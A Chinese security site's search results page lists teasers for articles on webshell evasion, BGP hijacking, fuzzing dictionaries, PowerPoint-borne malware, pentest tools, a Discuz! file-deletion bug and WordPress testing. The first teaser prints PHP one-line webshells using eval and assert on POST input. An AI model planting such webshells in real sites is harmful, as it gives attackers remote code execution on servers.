搜索[安全],共找到299个文章
关于PHP的webshell免杀小结
0X00普通的一句话木马(适用于CTF和小站) <?php eval($_POST['a']); ?> //函数的相似替换 <?php assert($_POST['a']); ?> <?php @eval($_POST['110']);?>与第一个一句话木马...
BGP劫持原理及如何防御
互联网跟人类社会一样,都通过特定的规则和法律来确保社会的正常运行。BGP协议就是互联网中的“规则”之一。BGP用于在不同的自治系统(AS)之间交换路由信息,当两个AS需要交换路由信息时,每个AS...
一个组合多位师傅的渗透测试字典 建议收藏
项目地址:https://github.com/TheKingOfDuck/fuzzDicts content 参数Fuzz字典Xss Fuzz字典用户名字典密码字典目录字典sql-fuzz字典ssrf-fuzz字典XXE字典ctf字典Api字典路由器后台字典文件后缀F...
鼠标悬停也能中招!带毒PPT正用来传播Graphite恶意软件
据Bleeping Computer网站消息,俄罗斯黑客已经开始使用一种新的代码执行技术,该技术依赖于 Microsoft PowerPoint 演示文稿(PPT)中的鼠标移动来触发恶意 PowerShell 脚本传播 Graphite 恶意软...
安全工具 EasyPen alpha 1.0 发布
最初计划写EasyPen这个工具,是因为笔者认为 单机性能已经非常强大,哪怕是在家庭网络下,发包速率也非常可观一般漏洞的应急,在已具备资产发现能力的情况下,写十几行代码扫全网,应该可以非常...
SharpImpersonation:一款基于令牌和Shellcode注入的用户模拟工具
关于SharpImpersonation SharpImpersonation是一款功能强大的用户模拟工具,该工具基于令牌机制和Shellcode注入技术实现其功能,可以帮助广大研究人员更好地对组织内部的网络环境和系统安全进行...
【初级】Discuz!X ≤3.4 任意文件删除漏洞
漏洞描述:Discuz!X社区软件是一个采用PHP 和MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。 2017年9月29日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞...
如何使用SystemInformer监控系统资源、调试软件和检测恶意软件
关于SystemInformer SystemInformer是一款功能强大的系统安全检测工具,该工具功能十分强大,不仅可以帮助广大研究人员监控系统资源,而且还支持软件调试和恶意软件检测。 功能介绍 1、提供系统...
干货 | WordPress网站渗透方法指南
如果您遇到使用 WordPress 的网站,您会怎么做,渗透思路和安全检测思路? 如何挖掘Wordpress网站的漏洞 如果您访问https://target.com并查看源代码,您将看到来自 WordPress 的主题和插件的链...
蜻蜓点水binlog
简述 Binlog是记录所有数据库表结构变更以及表数据修改的二进制日志,不会记录SELECT和SHOW这类操作。 Binlog日志是以事件形式记录,还包含语句所执行的消耗时间。 开启Binlog日志有以下两个最...